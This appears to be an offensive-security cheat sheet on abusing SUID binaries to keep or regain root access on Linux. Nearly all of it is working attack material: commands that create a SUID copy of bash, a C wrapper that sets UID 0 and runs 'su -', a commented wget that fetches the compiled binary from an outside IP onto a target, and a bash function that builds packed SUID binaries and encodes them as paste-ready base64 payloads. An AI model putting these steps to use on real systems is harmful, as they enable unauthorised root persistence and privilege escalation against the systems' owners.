SUID

bash

Abusing unstable root access or EUID to create a suid bash

# As root
cp /bin/bash /tmp/bash
chown root:root /tmp/bash
chmod 4777 /tmp/bash

# As user
/tmp/bash -p -c 'python3 -c "import pty,os;os.setresuid(0,0,0);pty.spawn(\"/bin/bash\")"'

Manual

Abusing effective UID (EUID) to run su as root

cat <<'EOF'|tee /tmp/su.c
#include <stdlib.h>
#include <unistd.h>
int main() {
setresuid(0, 0, 0);
system("su -");
return 0;
}
EOF
# Static build
gcc -static  -static-libgcc -static-libstdc++ -O0 -g -o /tmp/suidsu /tmp/su.c -m64
sudo cp /tmp/suidsu /var/www/html/suidsu
# wget 1.2.3.4/suidsu -O /tmp/suidsu
# /tmp/bash -p -c /tmp/suidsu

# Or direct build on target env
# gcc -O0 -g -o /tmp/suidsu /tmp/su.c -m64

Script

Abusing EUID

# Bash function

setuid() {
CMD="$1"
_ID="$2"
ARCH="$3"
if [ -z "$CMD"  ] ; then CMD="bash" ; fi
if [ -z "$_ID"   ] ; then _ID="geteuid()"     ; fi
if [ -z "$ARCH" ] ; then ARCH="64"  ; fi

if [ "$_ID" != "geteuid()" ] ; then
  TMPNAME="/tmp/SETUID-$ARCH-$_ID-$(echo $CMD | md5sum | cut -d ' ' -f1)"
else
  TMPNAME="/tmp/SETUID-$ARCH-EUID-$(echo $CMD | md5sum | cut -d ' ' -f1)"
fi

C="#include <stdlib.h>
#include <unistd.h>
int main() {
setresuid($_ID, $_ID, $_ID);
system(\"$CMD\");
return 0;
}"

echo -e "$C" > ${TMPNAME}.c
gcc -static  -static-libgcc -static-libstdc++ -O0 -g -o $TMPNAME.static ${TMPNAME}.c -m${ARCH}
upx $TMPNAME.static
gcc -O0 -g -o $TMPNAME ${TMPNAME}.c -m${ARCH}

OUTPUT="\necho '$(cat $TMPNAME | gzip | base64 -w0)'|base64 -d|gzip -d>$TMPNAME"
echo -e "$OUTPUT"

if [ "$_CMD" == "geteuid()" ] ; then echo -e "
chown ${_ID}:${_ID} $TMPNAME
chmod 4777  $TMPNAME
" ; fi

ls -ltrh $TMPNAME

}

Paste function in terminal or add it to your bashrc, don’t mind the “setresuid” warning on compilation.

setuid bash function also send outputfile to clipboard, just paste content to target terminal and apply user/perms.

output:

(user1)$ setuid whoami 0 64
[..]
echo 'RESULTBASE64'|base64 -d|gzip -d>/tmp/SETUID-64-0-whoami

# With target user on target env:
chown 0 /tmp/SETUID-64-0-whoami
chmod 4777 /tmp/SETUID-64-0-whoami

-rwxrwxr-x 1 user1 user1 18K [..] /tmp/SETUID-64-0-whoami

Exemple:

# Usage: setuid COMMAND USERID x64/32
# Let's try to export root access (id 0)
(user1)$ setuid whoami 0 64

# Can't use root yet
(user1)$ /tmp/SETUID-64-0-whoami
user1

# Use target(root) account to apply SUID permission
(root)$ chown root: /tmp/SETUID-64-0-whoami && chmod 4755 /tmp/SETUID-64-0-whoami

# Get back to user1 and try the SUID whoami
(user1)$ /tmp/SETUID-64-0-whoami
root